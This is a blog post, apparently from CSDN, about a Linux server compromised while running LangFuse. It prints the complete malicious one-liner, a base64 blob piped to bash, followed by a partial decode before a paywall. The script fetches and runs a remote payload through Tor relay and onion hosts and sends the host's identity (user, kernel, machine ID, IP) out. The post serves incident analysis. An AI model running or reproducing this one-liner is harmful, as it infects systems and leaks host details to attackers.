使用 LangFuse 意外被挂马!我是怎么恢复系统稳定的?

已于 2024-05-26 21:51:55 修改
阅读量1.1k 收藏 20
点赞数 35
分类专栏: 夜运维 linux docker 文章标签: centos linux
于 2024-05-26 21:51:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h_midnight/article/details/139195114
版权

在使用 LangFuse 过程中,被意外挂马!通过一番折腾服务恢复正常~ 本文将详细介绍应对恶意脚本和进程的完整方案,包括识别、清理、恢复和预防步骤。

阿里云扫到的信息

在这里插入图片描述

被执行的 Base64

SUlaQnRTCmV4ZWMgJj4vZGV2L251bGwKSUhDa0hQbmQ9Li8uJChkYXRlfG1kNXN1bXxoZWFkIC1jMjApClNVZ3VLVW1XPShkb2gubGkgZG9oLnB1YiBkb2guZG5zLnNiIGRucy50d25pYy50dyBkbnMubXVsbHZhZC5uZXQgZG9oLmxpYnJlZG5zLmdyIGRucy5uamFsLmxhKQpxTHRkSHlLej0iL3RtcC8uSUNFLXVuaXgiCnlzUlVkaWNKPSJjdXJsIC1tNjAgLWZrc0xBLSAtLWRvaC11cmwgaHR0cHM6Ly8ke1NVZ3VLVW1XWyQoKFJBTkRPTSUkeyNTVWd1S1VtV1tAXX0pKV19L2Rucy1xdWVyeSIKdUphR2dtR2E9ImN1cmwgLW02MCAtZmtzTEEtIgpicXlmaU1wTD0icmVsYXkudG9yMnNvY2tzLmluIgpIWVNNYUd0eD0icnU2cjRpbmthZjR0aGxnZmxnNGlxczVtaHF3cXVib2xzNXFhZ3NwdnlhNHdocDNkZ2J2bXloYWQiClBBVEg9L2Jpbjovc2JpbjovdXNyL2JpbjovdXNyL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9sb2NhbC9zYmluOi90bXAvOi92YXIvdG1wOi46JHFMdGRIeUt6OiRIT01FOiRQQVRICgp4YU9TWUZNWigpIHsKCXJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKCURPQz0vJHtwYXRoLy8gLy99CglIT1NUPSR7c2VydmVyLy86Kn0KCVBPUlQ9JHtzZXJ2ZXIvLyo6fQoJW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCWV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAoJZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5Vc2VyLUFnZW50OiAtXHJcblxyXG4iID4mMwoJKHdoaWxlIHJlYWQgbGluZTsgZG8KCVtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKCWRvbmUgJiYgY2F0KSA8JjMKCWV4ZWMgMz4mLQp9CgpqZWpPeE5yRygpIHsKCWZvciBpIGluIC91c3IvYmluIC91c3IvbG9jYWwvYmluIC92YXIvdG1wIC90bXAgLiAkcUx0ZEh5S3o7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKZ1JHS0RmSHooKSB7CglObXFYa3pqeT0vZXhlYwoJdmFqc1BCbVM9cGcwXyQoY3VybCAtczQgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC1zNCBpZGVudC5tZSlfJCh3aG9hbWkpXyQodW5hbWUgLW4pXyQodW5hbWUgLXIpXyQoY2F0IC9ldGMvbWFjaGluZS1pZHx8KGlwIHJ8fGhvc3RuYW1lIC1pfHxlY2hvIG5vLWlkKXxtZDVzdW18YXdrIE5GPTEpCgkkeXNSVWRpY0ogLXggc29ja3M1aDovLyRicXlmaU1wTDo5MDUwIC1lJHZhanNQQm1TICRIWVNNYUd0eC5vbmlvbiRObXFYa3pqeSAtbyRJSENrSFBuZCB8fAoJJHlzUlVkaWNKIC1lJHZhanNQQm1TICQxJE5tcVhremp5IC1vJElIQ2tIUG5kIHx8CgkkdUphR2dtR2EgLXggc29ja3M1aDovLyRicXlmaU1wTDo5MDUwIC1lJHZhanNQQm1TICRIWVNNYUd0eC5vbmlvbiRObXFYa3pqeSAtbyRJSENrSFBuZCB8fAoJJHVKYUdnbUdhIC1lJHZhanNQQm1TICQxJE5tcVhremp5IC1vJElIQ2tIUG5kCn0KCmF3V2pNR3FLKCkgewoJY2htb2QgK3ggJElIQ2tIUG5kOyRJSENrSFBuZDtybSAtZiAkSUhDa0hQbmQKfQoKSm9GeG9XcUcoKSB7CglscyAvdG1wLy5JQ0UtdW5peCB8fCBta2RpciAtcCAvdG1wLy5JQ0UtdW5peAogICAgICAgIGplak94TnJHCgljdXJsIC1WIHx8ICh4YU9TWUZNWiBodHRwOi8vJEhZU01hR3R4LnRvcjJ3ZWIucmUvbG9hZC9jdSA+IGN1cmwpCgljaG1vZCAreCBjdXJsCglnUkdLRGZIeiAkSFlTTWFHdHgudG9yMndlYi5yZSB8fAoJZ1JHS0RmSHogJEhZU01hR3R4LnRvcjJ3ZWIuaW4gfHwKCWdSR0tEZkh6ICRIWVNNYUd0eC50b3Iyd2ViLml0Cglhd1dqTUdxSwp9CgpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uSUNFLXVuaXgvZCkvbWFwcyB8fCBKb0Z4b1dxRwo=|base64 -d|bash

解析后的Base64 内容

IIZBtS
exec &>/dev/null
IHCkHPnd=./.$(date|md5sum|head -c20)
SUguKUmW=(doh.li doh.pub doh.dns.sb dns.twnic.tw dns.mullvad.net doh.libredns.gr dns.njal.la)
qLtdHyKz="/tmp/.ICE-unix"
ysRUdicJ="curl -m60 -fksLA- --doh-url https://${SUguKUmW[$((RANDOM%${
    #SUguKUmW[@]}))]}/dns-query"
uJaGgmGa="curl -m60 -fksLA-"
bqyfiMpL="relay.tor2socks.in"
HYSMaGtx=
最低0.47元/天 解锁文章
_midnight
关注
  • 35
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
目前网站检测工具有哪些?如何防止网站被
weixin_42945180的博客
05-24 1691
在我们日常seo优化工作当中,会经常碰到网站被了,原因是我们很多都是用的常用的cms网站系统,如织梦、帝国等,这种网站程序都是开源的代码,所以就会有些漏洞,导致很多所谓刚入门的学习的所谓黑客们进行攻击,利用各种检查工具进行攻击,导致我们的网站网页中有其他乱七八糟的页面,严重的首页打不开,后台没有权限打开等。那么接下来就为广大seo优化人员讲解一下,如果你网站被了,如何检查出来,然后又如何进行防止被,进行相应的措施,加强网站的安全维护。 一**、那么,网站检测工具有哪些呢?** 1、第一种
网站被黑了被篡改后我是如何解决网站被
热门推荐
网站安全专家
06-07 1万+
1、发现被黑,网站被黑的症状      两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。大多数百度抓取收录的页面title和description被篡改,如下图,title标题被改成xx友情链接,描述description是一些广告网址。但是点进去以后,访问正常,页面显示正常,页面源代码...
php被,PHP网站被防御战
weixin_42388716的博客
03-12 458
最近把几个PHP网站的程序备份到本地,准备与本地的发布版的svn做内容整合。发现有一些non-versioned的程序文件,仔细查看,是一些木程序。 我在本地测试了这些木程序,可以读取所有硬盘的文件,可以随意修改文件,下载任意硬盘位置的文件,上传文件到主最近把几个PHP网站的程序备份到本地,准备与本地的发布版的svn做内容整合。发现有一些non-versioned的程序文件,仔细查看,是一些木...
php被,近日报网站被的解决方法
weixin_29554849的博客
03-12 566
核心框架为ThinkPHP5.0版本的:在think\App类的module方法的获取控制器的代码后面加上if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }最终效果// 获取控制器名$contro...
如何防止网站被侵入,如何防止网站被,如何防止网站被入侵?
网站安全专家
06-03 3595
一:预防措施: 1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。 2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程 序,只要可以上传文件的asp都要进行身份认证! 3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。 4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进...
网站被,谨防IIS模块
我是来搞笑的小白
09-12 2014
今天遇到一个很奇怪的问题,查关键词,查数据库等常规方法都没有找到原因,debug断点都放在了程序执行代码最前面还是输出内容,用php探针发现也有代码,所以确认了是iis全局的问题,所以查加载查组件,最终经过比对是iis被黑添加了模块,被添加的名称很具有迷惑性,通常伪装的很像系统模块,遇到查不到是什么地方,可以放一个探针来判断下是不是iis问题。 » 转载请保留出处:豫章小站...
IIS 被了,如何处理?
liwendong528的专栏
08-01 1520
什么现象是IIS? (前提)网站程序没有发现被的文件, 但是访问网站的时候,页面会突然跳转到到别的网站去 网站会出现莫名奇妙的链接,图片,页面等。 网站域名经常会有错误的,甚至是莫名奇妙的地址访问(有的时候是扫漏洞,但是次数多了,就是被,域名被反利用了) IIS的重要文件夹 C:\inetpub\ : IIS文件的操作历史,日志,默认文件 C:\inetpub\history: IIS配置文件更改历史记录 C:\Windows\System32\inetsrv...
WordPress站点被,如何预防、检测和应对?
qq_21750317的博客
06-17 956
WordPress站点被,如何预防、检测和应对?
网站被,有免费检测的网站吗?
长风破浪会有时的博客
03-14 885
网站被,有免费检测的网站吗?
织梦安全防护教程首页被挟持、被串改、被、被入侵之后如何解决?-附件资源
03-02
织梦安全防护教程首页被挟持、被串改、被、被入侵之后如何解决?-附件资源
讲解SQL Server数据库被的解决方案
08-04
一个网站遭遇入侵,破坏相当严重,SQL数据库被,所有的表里面大部分字段都被多次重复插入代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞。...
linux中安装node并设置软链、全局变量
_midnight的博客
08-16 3822
准备工作 下载linux版本的node.js。 在官网中点击tab中的下载。页面跳转后可看到有俩个子tab,长期支持版、当前发布版,可依据需求选择下载版本。选择下载其它历史版本的node,下拉页面可看到 以往的版本 按钮,点击后会跳转至历史版本页面,选择需要下载的版本,然后点击对应版本右方的下载按钮,选择对应的系统版本即可下载。linux较为常用的版本为 Linux 二进制文件 (x64) ,当然具体选择依据你的系统版本。 在widows下访问node官网 下载,选择liunx版本。下载完成后使用
解决方案:dockerfile无法下载依赖,docker容器内无外网
_midnight的博客
09-02 2107
一、 查看宿主机的nameserver > cat /etc/resolv.conf search openstacklocal nameserver 100.125.3.250 nameserver 100.125.1.250 options single-request-reopen nameserver 8.8.8.8 nameserver 8.8.8.4 $systemctl restart NetworkManager 二、 创建或修改 /etc/default/dock.
安装kali-linux提示vesamenu.c32 not a COM32R image
_midnight的博客
08-16 1353
错误原因 初查为老电脑原因~ 错误图片 解决方案 点击TAB键,会出现安装菜单。 BOOT中输入installgui,点击回车。 boot: installgui 稍等片刻会出现GUI页面,正常按照即可。
linux下npm/yarn运行项目报错!
_midnight的博客
06-12 916
解决 Error: ENOSPC: System limit for number of file watchers reached 原因: linux系统程序监视超出了默认限制大小,需要手动设置。 查询当前系统限额: cat /proc/sys/fs/inotify // 进入系统监控目录 ls // 显示当前文件夹下的文件 cat ./max_user_watch* // 查看当前系统用户最大限额(*代表当前系统下的文件扩充名,不同版本的linux展示的文件名称...
服务器安全审计: chkrootkit 和 rkhunter 详解
最新发布
_midnight的博客
05-26 834
chkrootkit和rkhunter是两个广泛使用的安全工具,用于检测系统是否被Rootkit或其他恶意软件感染。本文将详细说明这两个工具的使用方法及如何解释检测结果。
CentOS 上安装 PostgreSQL 的全面指南
_midnight的博客
05-22 807
这篇指南详细介绍了如何在 CentOS 上安装和设置 PostgreSQL。内容包括 PostgreSQL 的优势、分步安装指南、常见问题及解决方案,以及总结。通过本指南,您可以在 CentOS 上高效部署和管理 PostgreSQL 数据库。
PostgreSQL 连接和管理问题解决方案
_midnight的博客
05-23 655
本文介绍了解决PostgreSQL连接问题的方法,包括修改认证方式和用户角色管理。还提供了在不同操作系统上卸载PostgreSQL的步骤。如有问题,请留言或联系我。
怎么看网站被的工具
03-31
作为AI,我无法提供具体的工具,但是以下是一些检测网站是否被的方法: 1. 使用杀毒软件扫描:使用一款可靠的杀毒软件,对网站进行全面扫描,以查找是否存在恶意软件。 2. 检查网站的安全证书:如果网站拥有有效的安全证书,那么访问该网站时浏览器会显示一个锁形状的图标,表示该网站是安全的。 3. 检查网站的源代码:检查网站的源代码,查看是否存在恶意代码,例如JavaScript等。 4. 检查网站的访问速度:如果网站的访问速度变慢,可能是因为网站被黑客攻击,导致网站的性能下降。 5. 使用在线工具:在线工具如Google Safe Browsing、VirusTotal等可以帮助检测网站是否被。 请注意,这些方法都是相对可靠的,但不能保证100%准确性。如果怀疑网站被,应该尽快联系网站管理员或专业的安全团队进行处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_midnight

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值